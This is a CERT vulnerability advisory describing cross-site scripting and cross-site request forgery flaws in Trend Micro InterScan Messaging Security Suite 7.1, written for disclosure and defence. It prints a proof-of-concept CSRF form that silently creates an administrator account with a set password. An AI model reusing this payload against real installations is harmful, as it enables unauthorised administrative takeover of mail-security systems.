Vulnerability Note VU#471364

Trend Micro InterScan Messaging Security Suite is vulnerable to XSS and CSRF vulnerabilities

Original Release date: 13 Sep 2012 | Last revised: 14 Aug 2014


Trend Micro InterScan Messaging Security Suite Version 7.1-Build_Win32_1394 has been reported to be susceptible to cross-site scripting and cross-site request forgery vulnerabilities.


Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79) and cross-site request forgery (CWE-352) vulnerabilities.

Cross-site scripting (CVE-2012-2995) (CWE-79)
Persistent/Stored XSS

Non-persistent/Reflected XSS

Cross-site request forgery (CVE-2012-2996) (CWE-352)
CSRF add admin privilege account
<form action="hxxps://" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra&#46;123" />
<input type="hidden" name="confirmPwd" value="quorra&#46;123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />


An unauthenticated attacker may be able to execute arbitrary script in the context of a logged in user's session.


We are currently unaware of a practical solution to this problem. Please consider the following workarounds.

Restrict access

As a general good security practice, only allow connections from trusted hosts and networks. Restricting access would prevent an attacker from accessing the InterScan Messaging Security Suite using stolen credentials from a blocked network location.

Vendor Information (Learn More)

VendorStatusDate NotifiedDate Updated
Trend MicroAffected10 Aug 201212 Sep 2012
If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

Group Score Vector
Base 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P
Temporal 5.5 E:POC/RL:U/RC:UC
Environmental 1.4 CDP:ND/TD:L/CR:ND/IR:ND/AR:ND



Thanks to Tom Gregory for reporting this vulnerability.

This document was written by Jared Allar.

Other Information

  • CVE IDs: CVE-2012-2995 CVE-2012-2996
  • Date Public: 13 Sep 2012
  • Date First Published: 13 Sep 2012
  • Date Last Updated: 14 Aug 2014
  • Document Revision: 18


If you have feedback, comments, or additional information about this vulnerability, please send us email.